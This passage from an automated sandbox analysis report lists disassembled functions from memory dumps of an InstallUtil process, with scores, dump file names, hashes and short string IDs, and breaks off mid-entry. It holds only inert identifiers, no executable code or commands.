                          • Opcode Fuzzy Hash: e8d594cb4ae8df7602594c93fe0d0a976f075045ca299eedc5c4a6f81d4aac92
                          • Instruction Fuzzy Hash: 10819474E00218DFDB14DFAAD994A9EBBF2BF88300F14C06AE519AB365DB349941CF51
                          Function 014DC762 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 0dc0278adb002696fd6ca899951af3dffd7897a0b7c78f89dbc33371aac0a872
                          • Instruction ID: 6754f8505a25977522cb6feef3eed5b73ad855b85ab7a0e6073f03bac67fdd8d
                          • Opcode Fuzzy Hash: 0dc0278adb002696fd6ca899951af3dffd7897a0b7c78f89dbc33371aac0a872
                          • Instruction Fuzzy Hash: 9F819374E01218DFDF54DFAAD994A9EBBF2BF88310F14806AE419AB365DB309941CF50
                          Function 014DB7E2 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 53ed72b84ba35ef9872dd42317ae2bd0a668677525bdc02f07c9fad4d525ed1c
                          • Instruction ID: 91aa21d4bf973509a7bd3b0ac5f5130253f3f5f0360fe189f68f662632608203
                          • Opcode Fuzzy Hash: 53ed72b84ba35ef9872dd42317ae2bd0a668677525bdc02f07c9fad4d525ed1c
                          • Instruction Fuzzy Hash: 28819274E002588FDF14DFAAD894A9EBBF2FF89300F15806AE419AB365DB349941CF11
                          Function 014DBE97 Relevance: 6.4, Strings: 5, Instructions: 178COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: ddfbc0ada75d341b4ed355f9347d5f0fb258433eed602bf390f8d5353c14a08b
                          • Instruction ID: aef68cef1802922154b11726897f42a73f89605fe81524864f46e392525a2920
                          • Opcode Fuzzy Hash: ddfbc0ada75d341b4ed355f9347d5f0fb258433eed602bf390f8d5353c14a08b
                          • Instruction Fuzzy Hash: 388183B4E01218CFDB15DFAAD994A9DBBF2BF89300F14806AE419AB365DB309941CF10
                          Function 014DBEC0 Relevance: 3.9, Strings: 3, Instructions: 154COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$PHeq$PHeq
                          • API String ID: 0-3920970646
                          • Opcode ID: 57bbfe2b02d94b7487ad13fb6086e0e9e21c987896b80d81df4cba77ede38cd8
                          • Instruction ID: 1c3ac56d3200a47d35acb9c603bd482cdb7e8115370c1dcada1eb7e1e6c19869
                          • Opcode Fuzzy Hash: 57bbfe2b02d94b7487ad13fb6086e0e9e21c987896b80d81df4cba77ede38cd8
                          • Instruction Fuzzy Hash: F261B4B4E002189FDF14DFAAD994A9EBBF2BF89300F14C06AE518AB365DB345941CF50
                          Function 014DB502 Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$PHeq$PHeq
                          • API String ID: 0-3920970646
                          • Opcode ID: f01ad9e24b459906116ffbaf2673e84458b8edd62c5fbfc1167465c64cd7ae3f
                          • Instruction ID: 914d76cb3869c02110b976390748088e854e32177ea48fc94b8cbd70869bbfa5
                          • Opcode Fuzzy Hash: f01ad9e24b459906116ffbaf2673e84458b8edd62c5fbfc1167465c64cd7ae3f
                          • Instruction Fuzzy Hash: 3A619174E002089FDB14DFAAD994A9EBBF2FF89300F15C16AD819AB365DB349941CF11
                          Function 014D9868 Relevance: 3.3, Strings: 2, Instructions: 848COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$4'eq
                          • API String ID: 0-2258195259
                          • Opcode ID: 161dc39984392e3d1da223486d2a12f2a62713442aa0b8d9a536a26e14371fa0
                          • Instruction ID: 5653b6f4ec022b07a3e0941e0251d6815a1c6978ae05f2dbae63ddf3b42669a7
                          • Opcode Fuzzy Hash: 161dc39984392e3d1da223486d2a12f2a62713442aa0b8d9a536a26e14371fa0
                          • Instruction Fuzzy Hash: 55724A71A00209DFCF15CF68C994AAEBBB2FF88314F25855AE905DB3A1D730E991CB51
                          Function 014D6120 Relevance: 3.0, Strings: 2, Instructions: 509COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$Hiq
                          • API String ID: 0-1760408109
                          • Opcode ID: 0e288bd20d87c841ee5b2ac0aeb54627ca21bde0f8a034d54d33c159971d7fbc
                          • Instruction ID: 6d2bdfd8ae199b4b1659955d05e4b6262ddf92247740aba7947d2c43fbd82586
                          • Opcode Fuzzy Hash: 0e288bd20d87c841ee5b2ac0aeb54627ca21bde0f8a034d54d33c159971d7fbc
                          • Instruction Fuzzy Hash: 6B129E70A002199FDB14DF69C954AAEBBF6FF88300F25852AE5059B3A5EF34DD41CB90
                          Function 06858BED Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq$PHeq
                          • API String ID: 0-3382621680
                          • Opcode ID: c1a971e4a1cc13c96468801a8f236f33502570442fd3dcd89337a0aa80582ba4
                          • Instruction ID: b4d6685f042a08a8302bd5a990f68f899d5f5d25276e9d76853024ae065e9c73
                          • Opcode Fuzzy Hash: c1a971e4a1cc13c96468801a8f236f33502570442fd3dcd89337a0aa80582ba4
                          • Instruction Fuzzy Hash: FF91F3B4E01228CFDB64DFA9C844AEDBBF2BF89300F20816AD859AB355DB315941CF50
                          Function 068511A0 Relevance: .7, Instructions: 745COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af8d71981394527dad683acdf8c1b4e6908d6e14be8a66678323556c5408c0bb
                          • Instruction ID: d10578fe50972742a1e57d3f06529e83ec7a214d21ffeec59031f8f34d9f6440
                          • Opcode Fuzzy Hash: af8d71981394527dad683acdf8c1b4e6908d6e14be8a66678323556c5408c0bb
                          • Instruction Fuzzy Hash: 4C827F74E012288FDB65DF69C898BDDBBB2BF49300F1481EA991DA7265DB315E81CF40
                          Function 014DF017 Relevance: .7, Instructions: 715COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c504888b4ccbcd9db27e92876568217565e527777355c53e494948b9369f96e7
                          • Instruction ID: 61f540158bb91ad4ceecd6c5f6b3205b0f6b26e30b72ef9c12d1c2107470b454
                          • Opcode Fuzzy Hash: c504888b4ccbcd9db27e92876568217565e527777355c53e494948b9369f96e7
                          • Instruction Fuzzy Hash: F972C074E052298FDB64DF69C990BEDBBB2BB49300F1481EAD409A7365D7349E86CF40
                          Function 06858608 Relevance: .3, Instructions: 296COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07592340377c89f6e67520a24e681e43b36c614e162b6706d8eb52727153c859
                          • Instruction ID: 3a56001464c2d1fb3ad31252828c4c726e1c218fe914a2d2590b9a985236be5c
                          • Opcode Fuzzy Hash: 07592340377c89f6e67520a24e681e43b36c614e162b6706d8eb52727153c859
                          • Instruction Fuzzy Hash: 2EE1C3B4E01218CFDB54DFA5C954B9DBBB2FF89304F2081AAD808AB395DB355A85CF50
                          Function 0685B6E8 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6842f2d3637fe6661011548e4e7af57ad8befc892b691516be201e97045e074a
                          • Instruction ID: 284316a36e5ef63b6930ed44109342ed60630e0a206f3e729d83fc24113a0c1e
                          • Opcode Fuzzy Hash: 6842f2d3637fe6661011548e4e7af57ad8befc892b691516be201e97045e074a
                          • Instruction Fuzzy Hash: AAA1A174E012288FEB68CF6AC954B9DBBF2BF89300F14C1AAD50CA7254DB345A85CF51
                          Function 0685D670 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7df2aacdd747028a491dca6b7c2ba813caa6ea098dd27267c791398558dba7c
                          • Instruction ID: 6278fb80041399fab435f7a78ff3b128a9978095bf9f4e07080ec41ecb30d51b
                          • Opcode Fuzzy Hash: c7df2aacdd747028a491dca6b7c2ba813caa6ea098dd27267c791398558dba7c
                          • Instruction Fuzzy Hash: 29A1A470E012188FEB68CF6AC944B9DBBF2AF89300F14D0AAD90DA7254DB345A85CF55
                          Function 0685C388 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d80e54c7aabebf01b2c103d3be388c7bc0f2a058b46617882b3f2cc975c7fbd
                          • Instruction ID: f05533667cf76d6399a642650579fa3df11560fab97307f161ca69805573116e
                          • Opcode Fuzzy Hash: 5d80e54c7aabebf01b2c103d3be388c7bc0f2a058b46617882b3f2cc975c7fbd
                          • Instruction Fuzzy Hash: 03A1A375E012288FEB68CF6AC944B9DBBF2BF89304F14C0AAD50DA7254DB345A85CF50
                          Function 0685A408 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 10f64065d16c581f938f8d7a17abdef743cada7c39478a46b82b06faab7358cc
                          • Instruction ID: 95f053d540c9de3942faed0c98dca809f480ce45c4c4bd47c7117e244f7e6a0e
                          • Opcode Fuzzy Hash: 10f64065d16c581f938f8d7a17abdef743cada7c39478a46b82b06faab7358cc
                          • Instruction Fuzzy Hash: D5A19575E016188FEB68CF6AC984B9DBBF2BF89300F14C1AAD50DA7254DB345A85CF50
                          Function 0685C9D8 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 690c7e8a2039340e5340033f08bb1e3082c956a1b4f613855d84fa1a89dd5d10
                          • Instruction ID: ac8cc6456f0636de7a01ba41763e4e520196c8ff9c68ed772e50c78473b80aee
                          • Opcode Fuzzy Hash: 690c7e8a2039340e5340033f08bb1e3082c956a1b4f613855d84fa1a89dd5d10
                          • Instruction Fuzzy Hash: 9CA1A475E012288FEB68CF6AC944B9DBBF2AF89300F14C1AAD50DA7254DB345A85CF51
                          Function 0685BD38 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 81b9a4d64acfb3271a9f48b5cf8dd9becf46a05b2831126aba39b511f97bf3b8
                          • Instruction ID: 7431f7efef5550e8611eab4d07c13df37a55bfd73e30de0277c0ed514e24bff7
                          • Opcode Fuzzy Hash: 81b9a4d64acfb3271a9f48b5cf8dd9becf46a05b2831126aba39b511f97bf3b8
                          • Instruction Fuzzy Hash: A3A1A275E012288FEB68CF6AC944B9DBBF2BF89300F14C1AAD509A7255DB345A85CF50
                          Function 0685AA58 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 706859e9fb08c36b6834f020fdc4a404cfd11be62bd21160b69fda8f28868d45
                          • Instruction ID: dce31b10ff53273630e6c9ead7255f2adcfb8f7425cf107bd15fbb2ab8ecbc5f
                          • Opcode Fuzzy Hash: 706859e9fb08c36b6834f020fdc4a404cfd11be62bd21160b69fda8f28868d45
                          • Instruction Fuzzy Hash: BEA1A474E016188FEB68CF6AC984B9DBBF2AF89300F14C1AAD50DA7254DB345A85CF50
                          Function 0685B0A0 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b20a1314799a5b86d57f17e56f94189072936b14251513609ef9f9721b32a8e9
                          • Instruction ID: 98f673d80277e4d64f28036a04009c3ff914acc6afdbcbc88ba069c12b9fcccc
                          • Opcode Fuzzy Hash: b20a1314799a5b86d57f17e56f94189072936b14251513609ef9f9721b32a8e9
                          • Instruction Fuzzy Hash: BDA19175E016288FEB68CF6AC954B9DFBF2AF89300F14C1AAD50CA7254DB345A85CF50
                          Function 0685D028 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2df0e236908bde07842194f03e39415e64496b88986d2f7e007af9a9064c8f70
                          • Instruction ID: fb24c0f2307a2bad91c1f6060591af7ff664a23b3e800db4ccd164445012ff3f
                          • Opcode Fuzzy Hash: 2df0e236908bde07842194f03e39415e64496b88986d2f7e007af9a9064c8f70
                          • Instruction Fuzzy Hash: E3A19475E012188FEB68CF6AC944B9DFBF2AF89300F14C0AAD90CA7254DB345A85CF54
                          Function 0685B08F Relevance: .2, Instructions: 179COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b475ab5fafbaa5f67735a6404d226c343b1c3c2b201277e7addd80502ba63efd
                          • Instruction ID: 1e9ad2172e6ff2bad60d934ff01ab003d47fbc3773d754a275e954d40874fa4b
                          • Opcode Fuzzy Hash: b475ab5fafbaa5f67735a6404d226c343b1c3c2b201277e7addd80502ba63efd
                          • Instruction Fuzzy Hash: 0981B571E006288FEB68CF6AC954B9DFBF2AF89300F14C1AAD50DA7254DB344A85CF11
                          Function 06851191 Relevance: .2, Instructions: 174COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fb3a2bc4ca4827be479a9bec47341610df54947b8b81f08681418ee9d81b6394
                          • Instruction ID: d7a97fe69697f8fe6ecfd9ebca98c73c44ec275d79ceb68fe5d8656257825ab6
                          • Opcode Fuzzy Hash: fb3a2bc4ca4827be479a9bec47341610df54947b8b81f08681418ee9d81b6394
                          • Instruction Fuzzy Hash: 2C81BF74E412289FDBA5DF29D844BEDBBB2BB89300F1081EAD95DA7254DB305E81CF40
                          Function 0685D018 Relevance: .2, Instructions: 165COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95bc0e5395c2d32de96bc073bfb40fb830b7b037ca79dfec278106ae80757fa0
                          • Instruction ID: 176c9eb41166caf03a7b92a7b7ecf4de2f1b7fb78dc6c550ec523c37ef2cfc07
                          • Opcode Fuzzy Hash: 95bc0e5395c2d32de96bc073bfb40fb830b7b037ca79dfec278106ae80757fa0
                          • Instruction Fuzzy Hash: 48719771D016188FEB68CF6AC944BDDFAF2AF89300F14C0AAD50CA7254DB345A85CF55
                          Function 0685AA48 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b776f2fe6211b4420386309f4029fd2eb2af94a24c0d73d7bc55fed521cf892d
                          • Instruction ID: 90d231d5aba06cdf060ae69400586e27c4211a1eca26a69cc5711560938f27c7
                          • Opcode Fuzzy Hash: b776f2fe6211b4420386309f4029fd2eb2af94a24c0d73d7bc55fed521cf892d
                          • Instruction Fuzzy Hash: E27186B1E006288FEB68DF6AC94479DBBF2AF89300F14C1AAD50DA7254DB345A85CF51
                          Function 0685C9C8 Relevance: .1, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f303ad8594f02b7f8f098693abae969562bc01e30c6f0da36f99f059ae2c4f8a
                          • Instruction ID: 74be68b7287a84352ce0a0707b0748565600879ca438a33599d56c607c45e339
                          • Opcode Fuzzy Hash: f303ad8594f02b7f8f098693abae969562bc01e30c6f0da36f99f059ae2c4f8a
                          • Instruction Fuzzy Hash: FD4166B1E016188BEB58CF6BDD4579EFAF3AFC9314F04C1AAC50CA6264DB740A858F51
                          Function 068585FC Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3224ae2c0c9eca8fcf062aa9fb01064a5e673d826bbfcc738246909be297f6f7
                          • Instruction ID: 2eac61127a3b98e0a4ffd67d92535164b7d87f331121b72ca8808406f63769c7
                          • Opcode Fuzzy Hash: 3224ae2c0c9eca8fcf062aa9fb01064a5e673d826bbfcc738246909be297f6f7
                          • Instruction Fuzzy Hash: 3941C3B0E002188FEB58DFAAD8547DEBBF2AF88304F24C16AC418BB254DB755946CF54
                          Function 0685C378 Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba7472f17546a9685fd4e9e392e4720b836d5622dce87789b814c5bad4d1fc9b
                          • Instruction ID: b228237f6a1fdd2b96ca3b9fe1e26f445929cb8efc9e7f600f0c64b8e41fb009
                          • Opcode Fuzzy Hash: ba7472f17546a9685fd4e9e392e4720b836d5622dce87789b814c5bad4d1fc9b
                          • Instruction Fuzzy Hash: 0C4159B1E016188BEB58CF6BC9557CEFAF3AFC8304F04C1AAD50CA6265DB740A858F54
                          Function 0685BD28 Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f95ce8130d41739d087611e7315ceecf6a010c95d0a47d0e2e339abaf5b62200
                          • Instruction ID: c9fb72e6ce19deafa4d6763b994fede99caed4cbd18c62b1ff967392339dc2e9
                          • Opcode Fuzzy Hash: f95ce8130d41739d087611e7315ceecf6a010c95d0a47d0e2e339abaf5b62200
                          • Instruction Fuzzy Hash: AF416AB1E016188BEB58CF6BC9557CAFAF3AFC8300F04C1AAD50CA6264DB740A858F50
                          Function 0685B6D9 Relevance: .1, Instructions: 107COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d09d2cdaf090f08b49444bd39f7f11b500585ac0384651e49138e577ef615807
                          • Instruction ID: dcadf49a4235313152d0ea1892f97a062c16b59f2eecf355662547888265c123
                          • Opcode Fuzzy Hash: d09d2cdaf090f08b49444bd39f7f11b500585ac0384651e49138e577ef615807
                          • Instruction Fuzzy Hash: 1F4167B1E016188BEB58CF6BC94578DFAF3AFC8314F04C1BAD50CA6264DB740A858F51
                          Function 0685D663 Relevance: .1, Instructions: 107COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9949495d1e1a296fb1d3ca02057d44912c08935d7102a49876e25690c6c5ae0c
                          • Instruction ID: 749d1f53a77e0f39cf9854fd6dcf6d7b17456be64e561992cde9fb6da913f34d
                          • Opcode Fuzzy Hash: 9949495d1e1a296fb1d3ca02057d44912c08935d7102a49876e25690c6c5ae0c
                          • Instruction Fuzzy Hash: E8415AB1E016188BEB58CF6BD9457C9FAF3AFC8300F14C1AAD50CA6265DB740A858F51
                          Function 0685A3F8 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e68f276e36ba4fb91b5ac14a8da75c0138bb85598342662b67ec0ee555881fa
                          • Instruction ID: e3d53977bc8d50d111869e8df187b0985f507729de54ce5e860398de00e79bc6
                          • Opcode Fuzzy Hash: 7e68f276e36ba4fb91b5ac14a8da75c0138bb85598342662b67ec0ee555881fa
                          • Instruction Fuzzy Hash: 0F4169B1D016188FEB58CF6BC9457D9FAF3AFC8314F14C1AAC50CA6265DB740A858F50
                          Function 014D6E70 Relevance: 10.5, Strings: 8, Instructions: 473COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$(oeq$(oeq$(oeq$(oeq$(oeq$,iq$,iq
                          • API String ID: 0-4181857939
                          • Opcode ID: 530ae0d3f53599c2509ab79c49ccd80ce8f36e61c7dbae0365c1d5abaf6d2562
                          • Instruction ID: accffc543a9c70336d2df578af102c27bddb26dbc857cdaa6d38f2f042d27a69
                          • Opcode Fuzzy Hash: 530ae0d3f53599c2509ab79c49ccd80ce8f36e61c7dbae0365c1d5abaf6d2562
                          • Instruction Fuzzy Hash: 32122930A006498FCF15CF68D9A4A9EBBF2FF48319F15855AE9459B3A1DB30ED41CB50
                          Function 014D8801 Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq$;eq
                          • API String ID: 0-1536740294
                          • Opcode ID: ef764a0d56fa5e69dcf4954cdd49419cdc52de8ebef34dd08da2085d221f2f50
                          • Instruction ID: 0d63fbbc9cac01c6d2bcbdec937f429dab50e9af6850dc0d1f851f7193b9f32c
                          • Opcode Fuzzy Hash: ef764a0d56fa5e69dcf4954cdd49419cdc52de8ebef34dd08da2085d221f2f50
                          • Instruction Fuzzy Hash: B1F17E713005028FEF259A2DD979B3A7B96EF84704F1944ABE142CB3B6EA35DC42C742
                          Function 014D7808 Relevance: 3.2, Strings: 2, Instructions: 692COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
